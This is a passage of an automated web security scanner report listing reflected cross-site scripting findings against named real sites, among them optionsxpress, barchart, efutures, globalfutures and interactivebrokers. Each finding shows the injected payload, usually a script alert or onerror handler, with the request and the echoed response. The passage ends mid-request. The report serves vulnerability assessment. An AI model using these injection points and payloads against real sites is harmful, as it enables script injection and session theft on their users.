Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68139
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=3635DD574359FB62BB7ED9846973FF9A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:27:03 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
ionId = $('#guid').val();
var countryID = $('#lstCountryIDSel').val();
var newFirm;
var countryName = $("#lstCountryIDSel option:selected").text();
var oldFirm = "OX5b37e";alert(1)//81efc02e54c";
if (countryID >
...[SNIP]...

2.4. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 906ad"onerror%3d"alert(1)"19fe0f61530 was submitted in the firm parameter. This input was echoed as 906ad"onerror="alert(1)"19fe0f61530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX906ad"onerror%3d"alert(1)"19fe0f61530 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68201
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:26:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DC0FBF694E708FD4EC3FDDB144D503D5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:26:58 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
<img id="logo" src="/images/logos/firm/newlogo_ox906ad"onerror="alert(1)"19fe0f61530.gif" alt="optionsXpress" border="0"/>
...[SNIP]...

2.5. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c97"><script>alert(1)</script>dae92c231b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?97c97"><script>alert(1)</script>dae92c231b6=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 08 Sep 2011 19:47:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117289

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&97c97"><script>alert(1)</script>dae92c231b6=1" type="text/css" media="all" />
...[SNIP]...

2.6. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /m2/optionsxpress/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 5d1d7<script>alert(1)</script>6f7d154c782 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/optionsxpress/mbox/standard?mboxHost=www.optionsxpress.com&mboxSession=1315527919598-875378&mboxPage=1315527919598-875378&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=984&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=ox_lp_options_global5d1d7<script>alert(1)</script>6f7d154c782&mboxId=0&mboxTime=1315509919623&mboxURL=http%3A%2F%2Fwww.optionsxpress.com%2Fpromos%2Fexperience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007%26ef_id%3DzqROZUBXyFQAAIdR%3A20110908192437%3As&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures%2Btrading&mboxVersion=39 HTTP/1.1
Host: optionsxpress.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Thu, 08 Sep 2011 19:25:33 GMT
Server: Test & Target

mboxFactories.get('default').get('ox_lp_options_global5d1d7<script>alert(1)</script>6f7d154c782',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315527919598-875378.19");

2.7. http://transworld.websol.barchart.com/main.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://transworld.websol.barchart.com
Path:   /main.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e797'%3balert(1)//508d34a2d3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e797';alert(1)//508d34a2d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.php?page=def/8e797'%3balert(1)//508d34a2d3fault HTTP/1.1
Host: transworld.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Content-Language: en
Content-Length: 17302

document.write('<table width="100%" cellpadding="3" cellspacing="4" border="0">');
document.write('<tr><td class="bcQuotesCharts">Quotes &amp; Charts</td><td align="right" rowspan="2">');
document.wri
...[SNIP]...
mp = '';
   var page;
   if(bc_QueryForm['bcpage'])
       page = bc_QueryForm['bcpage'];
   else if (tmp)
       page = tmp;
   else if(bc_QueryForm['page'])
       page = bc_QueryForm['page'];
   else
       page = 'def/8e797';alert(1)//508d34a2d3fault';
   var qpage = 'def/8e797';alert(1)//508d34a2d3fault';
   var bcchartheader = '';

   // Include common JavaScript code.
   document.write('<script type="text/javascript" src="' + 'http' + '://shar
...[SNIP]...

2.8. http://transworld.websol.barchart.com/main.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://transworld.websol.barchart.com
Path:   /main.php

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3753'%3balert(1)//130dd2f800b was submitted in the page parameter. This input was echoed as d3753';alert(1)//130dd2f800b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.php?page=defaultd3753'%3balert(1)//130dd2f800b HTTP/1.1
Host: transworld.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Content-Language: en
Content-Length: 17300

document.write('<table width="100%" cellpadding="3" cellspacing="4" border="0">');
document.write('<tr><td class="bcQuotesCharts">Quotes &amp; Charts</td><td align="right" rowspan="2">');
document.wri
...[SNIP]...
= '';
   var page;
   if(bc_QueryForm['bcpage'])
       page = bc_QueryForm['bcpage'];
   else if (tmp)
       page = tmp;
   else if(bc_QueryForm['page'])
       page = bc_QueryForm['page'];
   else
       page = 'defaultd3753';alert(1)//130dd2f800b';
   var qpage = 'defaultd3753';alert(1)//130dd2f800b';
   var bcchartheader = '';

   // Include common JavaScript code.
   document.write('<script type="text/javascript" src="' + 'http' + '://shared.we
...[SNIP]...

2.9. http://webstation.barchart.com/eflogin.php [txtPassword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The value of the txtPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4752"><script>alert(1)</script>a4140041353 was submitted in the txtPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://webstation.barchart.com/eflogin.php
Content-Length: 25
Cache-Control: max-age=0
Origin: http://webstation.barchart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=l8d8m1qkadr5phrb94ttmb4st3

txtUsername=&txtPassword=a4752"><script>alert(1)</script>a4140041353

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:36 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3470
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<input type="password" id="txtPassword" name="txtPassword" value="a4752"><script>alert(1)</script>a4140041353" style="left: 100px; position: absolute; top: 120px; width: 150px; background-color: #eaeaea;" />
...[SNIP]...

2.10. http://webstation.barchart.com/eflogin.php [txtUsername parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The value of the txtUsername request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea4ef"><script>alert(1)</script>38aecde0899 was submitted in the txtUsername parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://webstation.barchart.com/eflogin.php
Content-Length: 25
Cache-Control: max-age=0
Origin: http://webstation.barchart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=l8d8m1qkadr5phrb94ttmb4st3

txtUsername=ea4ef"><script>alert(1)</script>38aecde0899&txtPassword=

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:36 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3470
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<input type="text" id="txtUsername" name="txtUsername" value="ea4ef"><script>alert(1)</script>38aecde0899" style="left: 100px; position: absolute; top: 100px; width: 150px; background-color: #eaeaea;" onfocus="if (this.value == 'Enter Username') { this.value=''; }" />
...[SNIP]...

2.11. https://www.barchart.com/register/realtime/css/_basicFormCSS.php [errorIds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.barchart.com
Path:   /register/realtime/css/_basicFormCSS.php

Issue detail

The value of the errorIds request parameter is copied into the HTML document as plain text between tags. The payload 98ee8<script>alert(1)</script>5edcc6f41ce was submitted in the errorIds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register/realtime/css/_basicFormCSS.php?errorIds=98ee8<script>alert(1)</script>5edcc6f41ce HTTP/1.1
Host: www.barchart.com
Connection: keep-alive
Referer: https://www.barchart.com/register/realtime/?ID=EF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:40:59 GMT
Server: Apache/2.2.9 (Fedora) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2409
Content-Type: text/css
Content-Language: en
Via: 1.1 www.barchart.com (Apache/2.2.9)
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive

form.realtime h1, form.realtime h2, form.realtime h3, form.realtime p, form.realtime li {
   font-family: "Arial", sans-serif;
}
form.realtime h1, form.realtime h2, form.realtime h3 {
   margin: 1.5em 0 .
...[SNIP]...
ow fieldset { padding: .25em; }
.infoVendorSubcriber { margin-left: 2em; }
.required { color: red; }
#errorMessages { padding: 1em; }
#errorMessages p { font-weight: bold; margin: 0; }

#errorMessages,98ee8<script>alert(1)</script>5edcc6f41ce { background-color: #FCC; }

2.12. http://www.efutures.com/faq.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.efutures.com
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5665b"><script>alert(1)</script>81084ae80e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq.php/5665b"><script>alert(1)</script>81084ae80e2 HTTP/1.1
Host: www.efutures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a class="active" href="/5665b"><script>alert(1)</script>81084ae80e2?category=1">
...[SNIP]...

2.13. http://www.efutures.com/traders/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.efutures.com
Path:   /traders/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42018"><script>alert(1)</script>2e60a284e12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /traders/news.php/42018"><script>alert(1)</script>2e60a284e12 HTTP/1.1
Host: www.efutures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/42018"><script>alert(1)</script>2e60a284e12?news_id=2417">
...[SNIP]...

2.14. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.futurestrading.com
Path:   /managed-accounts/what-are-managed-futures.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f91b8<script>alert(1)</script>8c91014d9af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html HTTP/1.1
Host: www.futurestrading.com
Proxy-Connection: keep-alive
Referer: http://www.futurestrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: af954db55ff4d54a88e086fc2a1751f0=f7f0571d6de3a89fad76557c5546f2e6; __utma=221442575.134975660.1315527952.1315527952.1315527952.1; __utmc=221442575; __utmz=221442575.1315527952.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=futures%20trading

Response

HTTP/1.1 404 Component not found (http://www.futurestrading.com/managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html)
Date: Thu, 08 Sep 2011 20:01:44 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 08 Sep 2011 20:01:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<div id="errorboxheader">404 - Component not found (http://www.futurestrading.com/managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html)</div>
...[SNIP]...

2.15. http://www.globalfutures.com/index.asp [refid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.globalfutures.com
Path:   /index.asp

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee6af"><script>alert(1)</script>ef3961711f was submitted in the refid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.asp?refid=googleaefee6af"><script>alert(1)</script>ef3961711f HTTP/1.1
Host: www.globalfutures.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35093
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: returningRefID=googleaefee6af%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eef3961711f; expires=Wed, 04-Jun-2014 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:25:44 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta cont
...[SNIP]...
<input type="hidden" name="reftag" value="googleaefee6af"><script>alert(1)</script>ef3961711f" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4fc1(a)66a27447bcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?a4fc1(a)66a27447bcc=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:30 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{colo
...[SNIP]...
",d,k)};})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?a4fc1(a)66a27447bcc\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.interactivebrokers.com/mobile/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881ed"><a%20b%3dc>bec079a6a29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 881ed"><a b=c>bec079a6a29 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/881ed"><a%20b%3dc>bec079a6a29 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:51:02 GMT
Server: Apache
Content-Length: 28145
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/881ed"><a b=c>bec079a6a29" method="POST">
...[SNIP]...

2.18. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_continuetowebsite.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b373"><a%20b%3dc>5dc4835aa60 was submitted in the REST URL parameter 3. This input was echoed as 5b373"><a b=c>5dc4835aa60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images5b373"><a%20b%3dc>5dc4835aa60/btn_continuetowebsite.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
